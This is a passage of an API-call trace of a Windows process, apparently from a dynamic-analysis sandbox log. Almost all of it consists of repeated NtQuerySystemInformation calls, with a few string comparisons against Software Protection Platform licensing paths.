(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1c0, Length=0x28, ResultLength=0x0) [0208.899] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe010, Length=0x28, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0208.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe800, Length=0x28, ResultLength=0x0) [0208.918] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0208.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0208.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0208.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0208.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x28, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe800, Length=0x28, ResultLength=0x0) [0208.928] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x50, ResultLength=0x0) [0208.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0208.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0208.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0208.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x28, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0208.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0208.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x50, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x50, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x50, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x50, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x50, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x50, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x50, ResultLength=0x0) [0209.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x38, ResultLength=0x0) [0209.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x28, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x28, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x28, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x28, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe590, Length=0x28, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x38, ResultLength=0x0) [0209.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe610, Length=0x28, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe610, Length=0x28, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4b0, Length=0x20, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe430, Length=0x20, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe430, Length=0x20, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe430, Length=0x20, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6f0, Length=0x38, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.827] NtQuerySystemInformation (SystemInformationClass=0xb9, 